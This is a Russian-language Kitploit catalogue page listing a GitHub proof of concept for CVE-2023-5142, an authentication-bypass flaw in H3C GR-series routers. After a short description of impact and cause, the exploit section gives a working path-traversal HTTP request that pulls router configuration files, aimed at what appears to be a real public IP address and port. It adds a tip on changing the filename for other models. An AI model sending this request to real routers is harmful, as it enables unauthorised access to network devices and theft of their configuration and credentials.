Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-H3C-Report — CVE-2023-5142 | Kitploit
Инструменты/GitHubGitHub/kuangxiaotu/cve-h3c-report
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииНеправильная Конфигурация
GitHubkuangxiaotu/cve-h3c-report

CVE-H3C-Report

CVE-2023-5142

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Уязвимость несанкционированного доступа к системе управления маршрутизаторами серии H3C GR

Продукт: Маршрутизатор серии GR

Версия: все

Оценка: высокий риск

Веб-сайт: http://www.h3c.com/

Опасности: Злоумышленники могут использовать эту уязвимость для получения конфиденциальной информации с маршрутизаторов, создавая специальные пакеты запросов для обхода проверки подлинности.

Принцип: Маршрутизатор не производил аутентификацию доступа к каталогам и связанным файлам

Эксплойт:

Примечание: необходимо изменить суффикс имени файла в POC, например, GR8300.cfg

root@kitploit:~
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

изображение

изображение

изображение

Скачать инструмент